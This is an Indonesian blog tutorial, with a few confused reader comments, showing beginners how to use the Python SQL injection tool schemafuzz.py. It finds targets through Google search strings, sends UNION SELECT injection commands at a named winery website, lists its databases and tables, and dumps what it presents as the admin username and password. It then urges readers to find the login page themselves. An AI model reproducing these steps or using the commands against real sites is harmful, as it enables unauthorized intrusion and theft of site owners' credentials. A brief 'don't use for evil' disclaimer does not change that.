• Cloud TAG

Tutorial Hacking Phyton

Hacking : Dengan Menggunakan Sql Injection Hanya Untuk Yang Serius Belajar….

Hello all, DI sini gua mau sharing Ilmu dikit mengenai Hacking Sql Injection Dengan Menggunakan Metode Schema fuzzy

Khusus buat Para Newbie Yang pengen belajar,,, jadi buat para master yang udah jago di liat2 aja dech….
Mungkin masih banyak kekurangan dalam Thread ini, untuk itu ayo kita sama sama belajar…

Langsung Masuk Ke pembahasanx yachh :

Schema Fuzzy adalah tools yang di buat dengan bahasa python yang dipergunakan untuk melakukan test SQL Injection pada sebuah website…
feature dan hal2 yang di butuhkan yaitu :

1. Komputer (fast speed)
2. Koneksi internet (fast connection)
3. Program Python-2.6.4 (bisa di download Di Sini !! Setelah Di download Langsung Di install di PC/Laptop anda)
4. script schemafuzzy.py (adalah script yang akan di gunakan untuk mencari database,column and table ,, Untuk download scriptsx Klik Di Sini !!)
5. CMD
6. target website (misal menggunakan kata kunci di google : “products.php?cat=”)

Sudah Di siapkan?
di pastikan Kamu sudah install python2.6.4. Copy schemafuzz.py ke dalam dir python26. Kalo sudah selesai langsung jalankan. Caranya :

klik start>>Run>>CMD
truss and aktif ke directory c:\ dengan mengetik CD ../.. <– mundur 2 dir

masuk ke directory Python26 dengan cara ketik “cd Python26” hingga muncul
C:\Python26>
perintah dasar schemafuzzy ini yaitu :

schemafuzzy.py -u “target” –perintah
1. kita gunakan di target kita. (disini saya ambil target yang saya dapatkan di google dengan kata kunci : “products.php?cat=”) yaitu :

http://www.queenannewine.com/products.php?cat=1

2. Cek kolomnya

python schemafuzzy.py -u http://www.queenannewine.com/products.php?cat=1 –findcol

Hingga muncul :
3. setelah ini kamu masuk ke direktory c:\ di mana python terinstall cari name file schemafuzzlog.txt <– di sini ada hasil column yang berhasil di cari tadi….
3. Cari Db nya..

python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3” -dbs

Hingga Muncul :
Kita sudah temukan data base site tersebut :
database ada 3 :

1.   C239128_QAWcal
2.   C239128_queen
3. C239128_queen2

tapi pada penjesalan ini kita akan gunakan database nomor2

4. Cari nama table dalam database C239128_queen

python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3” –schema -D C239128_queen

Hingga Muncul Hasil :
keluar semua colomnya… dari sini kita mengetahui bahwa web tersebut memiliki 56 Columns. (pic di atas pencarian Blom selesai, jadi kalian kalian harus selesaikan sampai column 56) Sekarang kita tinggal pilih kolom yang akan kita exploit ….

5. Exploit Tables and Columns :

python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3” –dump -D C239128_queen -T – di isi Nama table -C di isi nama columns..

Misal gua mau Melihat data data yang ada di columns admin :

Dengan perintah :

python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3” –dump -D C239128_queen -T admin -C adminUser,adminPassword

Hingga Muncul Hasil seperti di bawah ini :

Lihat
jbalji:mcse6273:mcse6273:

ini adalah user dan password admin yang keluar.. . Cara ini hanya berlaku untuk sql versi 5. untuk versi 4, Harus Manual.

Nah user and password admin dah ketahuan… untuk login ke adminx.. silahkan anda cari sendiri link loginx….

oke sekian dari saya (ihmmank).

segala penyalah gunaan dari artikel ini bukan Tanggung jawab penulis.

Semoga bermanfaat bagi anda.

Nb: Jangan di buat untuk ke jahatan yach…

Khusus bagi Anda Yang Blum mengerti anda bisa cari saya di irc.mildnet.org #nyubicrew

Thanks For All My friend…
great

DP2KN

Di Depan Komputer Menemukan Sesuatu hal yang baru, Mencari Kelamahan suatu system Jauh Lebih Baik Dari Pada Mencari/Mengejar Cinta Sejati
Apabila artikel ini bermanfaat bagi anda, yang udah iso, bisa ngasih cendol ke gua

(ini cuman sebagian dari ilmu tentang hacking, masih banyak cara laen)

Makasih Semua visit

3 Tanggapan

  1. walah2 …
    ribet amet y …
    mang gx ada cara laen ,slain lwat CMD ?

    • Klo tutorial Phyton setahu ane ya ntu doang cara na …
      mungkin bahasa pemrograman yg laen ada yg lebih simple ..
      maybe Visual basic getoh🙂

  2. hahahag …
    sumpah kak …
    ga ngerti …😀 ..
    hahahahaha

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s